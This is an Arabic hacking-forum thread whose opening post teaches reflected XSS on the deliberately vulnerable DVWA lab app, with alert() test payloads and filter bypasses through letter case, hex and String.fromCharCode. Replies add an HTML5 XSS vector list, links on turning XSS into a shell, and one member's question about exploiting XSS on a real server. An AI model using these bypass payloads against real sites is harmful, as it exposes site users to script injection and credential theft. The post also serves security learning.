Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


Geniu Mouka عضو مميز
  • شكراً: 610
  • تم شكره 344 مرة في 116 مشاركة

بسم الله الرحمن الرحيم
و الصلاة و السلام على محمد صلى الله عليه وسلم
و السلام عليكم ورحمة الله وبركاته
حديثنا اليوم على ثغرة منتشرة كثيرا في المواقع و مختلف التطبيقات المنتشرة في عالم الانترنت
Cross Site استبدال Scripting (Xss)
كثيرة الاكتشاف من قبل مواقع الحماية ولاكن اغلب الاكتشافات في التطبيقات التافهة و الغير معروفة لان معضمها من الاطفال فلا يعرف ما سبب الثغرة و لا حتى استغلال الثغرة مع
انها خطيرة جدا على المستعملين وعلى الموقع
وسنتطرق اليوم الى نوع منها و وهي
XSS reflected
غير مخزنة نجدها عادة في محركات البحث او في اماكن طلب ادخال الاسم
حيث نتمكن من تطبيق كود برمجي للغة الجافا سكربت
ولاكن احيانا تصادفنا فلترة تمنعنا من المتابعة
لاكن سابسط هذا ان شاء الله تعالى
عندنا مشروع بسيط و معروف سيتم التطبيق عليه وهو
Damn Vulnerable Web App
سوف نقوم بتنصيب التطبيق
ثم نضبط الحماية الى الادنى لنجرب اولا
-01-
ثم نتوجه للثغرة سنجد مربع يطلب منا ادخال الاسم
سندخل الاسم ليظهر امامنا بكل بساطة
-02-
لو دخلنا الى المصدر لوجدنا ان هنالك ثغرة
-03-
فنكتب كود لاختبار امكانية الثغرة
كود بلغة HTML:
     <استبدال script>alert("Test Sec4ever")</استبدال script> 
-04-
الان نضغظ على
Submit
-05-
لم نجد اية حماية تذكر
ستنغير الحماية درجة الحماية
-06-
ونطبق الكود

كود بلغة HTML:
<استبدال script>alert("Test Sec4ever")</استبدال script>
فنلاحظ انه لم يتنفد ونجد
-07-
ان جزء من الكود تحقق

كود بلغة HTML:
alert("Test Sec4ever")

واما بالنسبة لـ
كود بلغة HTML:
     <استبدال script>
لم يتنفذ وسنلاحظ هذا من السورس كود
-08-
ان الكود سكربت لا يتنفذ من خلال دراستنا للسورس فهي ممنوعة ولكن سنستعمل طريقة للتخطي تسمى
Obfuscation

كود بلغة HTML:
استبدال script != استبدال ScRiPt
سنتلاعب بحجم الحروف و نتخطاه بكل سهولة


كود بلغة HTML:
<استبدال ScRiPt>alert('Test Sec4ever(2)')</استبدال ScRiPt>
-10-
مطبق الكود و نلاحظ
-11-
وهناك طريقة اخرى و هي التشفير

Hex
ليعطينا كود يتم تنفيده مباشرة

3C7363726970743E616C657274282753656334657665722729 3C2F7363726970743E
حيث يصبح لدينا الكود التالي
- في حالة كانت
كود بلغة HTML:
     Magic_quotes_gpc = on

سيتم تعطيل كل من


كود بلغة HTML:
Single Quotation Mark + Doubke Quataion Mark
سنستخدم الدالة


وضع الكود بين قوسين بعد تحويله الى
ASCII

<استبدال script>alert(String.fromCharCode())</استبدال script>

الجزء الثاني

اظن ان هذه الثغرة تحتاج الكثير من الهندسة الاجتماعية
لنتفق انها هي
Html Injection
نستطيع حقن كود للغة في الرابط ومع بعض الهندسة الاجتماعية ستنجح
وافظل طريقة
استبدال iframe
حيث يتم عرض الصفحة الخاصة للكود
ثغرة كثيرة الانتشاء مع انها قليلة الاستعمال و طريقة ترقيتها سهلة
يوجد دوال مخصصة
Htmlspecialchars
Htmlentities
اتمنى ان افيد ولو شخص على الاقل
و الله بلغنا رمضان و جميع الاعضاء الكرام و الادارة و المسلمين اجمعين

توقيع
I'm not the best, but I aspire to it

[#]
28 أعضاء قالوا شكراً لـ Geniu Mouka على المشاركة المفيدة:
Geniu Mouka عضو مميز
  • شكراً: 610
  • تم شكره 344 مرة في 116 مشاركة

أرجو التعديل على الموضوع من طرف الادارة لانو حصل اضفت كود في الاول بالخطا

توقيع
I'm not the best, but I aspire to it

[#]
العسكري عضو مميز
  • شكراً: 1214
  • تم شكره 478 مرة في 168 مشاركة

حلو وشرح جميل بارك الله فيك بس في استفسار

انه في ثغرات مثل هي لكنها طباعه لا يوجد داله شو هو حلها لو عندك معلومات ؟!

Geniu Mouka عضو مميز
  • شكراً: 610
  • تم شكره 344 مرة في 116 مشاركة

المشاركة الأصلية كتبت بواسطة العسكري اقتباس :
حلو وشرح جميل بارك الله فيك بس في استفسار

انه في ثغرات مثل هي لكنها طباعه لا يوجد داله شو هو حلها لو عندك معلومات ؟!
لم أفهم المقصود بالضبط
لو توضح أكثر ممكن أفيدك

توقيع
I'm not the best, but I aspire to it

[#]
حارس القدس عضو نشيط
  • شكراً: 126
  • تم شكره 58 مرة في 29 مشاركة

اخي نحن منعرف ومنطلع بمواقع كثيره ثغرات Cross Site استبدال Scripting ( بس لهذه اللحظه ما قادرين كيف نستغلها او كيف ممكن تفيدينا يعني نجيب اليوزر والباس زي الحقن او اشيائ اخرى مثلا حد يعرف سكربت AIKI FRAMWORK وجدت سيرفر مركب هذا السكربت على السيرفر ولوحه التحكم واضحه ولكيبت فيو XSS لكن ما عرفنا كيف نستغلها فلذلك اذا بتوضحو هذا النوع من الثغرات خطيرررر جدا الله يجزيكو الخير

توقيع
There is no place like

127.0.0.1
الأعضاء الذين قالوا شكراً لـ حارس القدس على المشاركة المفيدة:
Geniu Mouka عضو مميز
  • شكراً: 610
  • تم شكره 344 مرة في 116 مشاركة

طبعا تستطيع الحصول على معلومات حساسة و خاصة اذا كانت الثغرة مخزنة مع انها قلت

شوف هذا خير ما جائت به الثغرة وسبق طرح في منتدى آخر الأخ DamanDz

http://www.exploit-db.com/vbseo-from...rse-php-shell/

توقيع
I'm not the best, but I aspire to it

[#]
الأعضاء الذين قالوا شكراً لـ Geniu Mouka على المشاركة المفيدة:
GB47 عضو مبدع
  • شكراً: 306
  • تم شكره 549 مرة في 222 مشاركة

شوف هذه الثغرة في ملف فلاش
http://soroush.secproject.com/blog/2...ng-a-swf-file/

مرة في أحد المجموعات أحد الأعضاء وضع ثغرة xss في الفيسبوك لكن الكود لا يشتغل تظهر الكتابة فقط

الأعضاء الذين قالوا شكراً لـ GB47 على المشاركة المفيدة:
Nani17
TeaM C
  • شكراً: 923
  • تم شكره 1035 مرة في 280 مشاركة

فدتنا كثير ياغالي
واجهتني كثير هالفلترات
وفي لها استغالالات قوية

توقيع
------------------------------

يـا رَبّ
GEOIX عضو مبدع
  • شكراً: 1178
  • تم شكره 2259 مرة في 551 مشاركة

المشاركة الأصلية كتبت بواسطة gb47 اقتباس :
شوف هذه الثغرة في ملف فلاش
http://soroush.secproject.com/blog/2...ng-a-swf-file/

مرة في أحد المجموعات أحد الأعضاء وضع ثغرة xss في الفيسبوك لكن الكود لا يشتغل تظهر الكتابة فقط
تلك ليست ثغرة حبيبي

بل كود تأكد من الاسم و اللقب فقط

توقيع
I'll be back soon

الوعي في العقول وليس في الأعمار ،فالأعمار مجرد عدّاد لأيامك.
Dr.Mohamed Sec4Ever Team
  • شكراً: 1888
  • تم شكره 5755 مرة في 1425 مشاركة

كود PHP:
List of XSS vectors for HTML 5:

 <
video> <source onerror=”javaاستبدال script:alert(1)>
<
video onerror=”javaاستبدال script:alert(1)><source>
<
audio onerror=”javaاستبدال script:alert(1)><source>
<
input autofocus onfocus=alert(1)>
<
select autofocus onfocus=alert(1)>
<
textarea autofocus onfocus=alert(1)>
<
keygen autofocus onfocus=alert(1)>
<
button form=test onformchange=alert(2)>X
<form><button formaction=”javaاستبدال script:alert(1)

توقيع
...........
4 أعضاء قالوا شكراً لـ Dr.Mohamed على المشاركة المفيدة: